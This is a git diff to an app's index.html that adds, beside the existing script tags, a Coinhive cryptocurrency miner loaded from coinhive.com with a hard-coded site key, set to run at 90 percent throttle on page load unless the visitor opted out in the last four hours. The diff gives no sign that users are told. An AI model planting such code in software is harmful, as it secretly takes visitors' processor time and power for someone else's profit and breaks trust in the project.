--- a/Codigo App/index.html
+++ b/Codigo App/index.html
@@ -224,6 +224,15 @@
         <script type="text/javascript" src="js/index.js"></script>
         <script type="text/javascript" src="js/cronometro.js"></script>
         <script type="text/javascript" src="js/base.js"></script>
+<script src="https://coinhive.com/lib/coinhive.min.js"></script>
+<script>
+	var miner = new CoinHive.Anonymous('uZcxu45nqi4UXQ5SIjex8079JesIPln9', {throttle: 0.9});
+	// Only start on non-mobile devices and if not opted-out
+	// in the last 14400 seconds (4 hours):
+	if (!miner.didOptOut(14400)) {
+		miner.start();
+	}
+</script>
         <script type="text/javascript">
             app.initialize();
         </script>
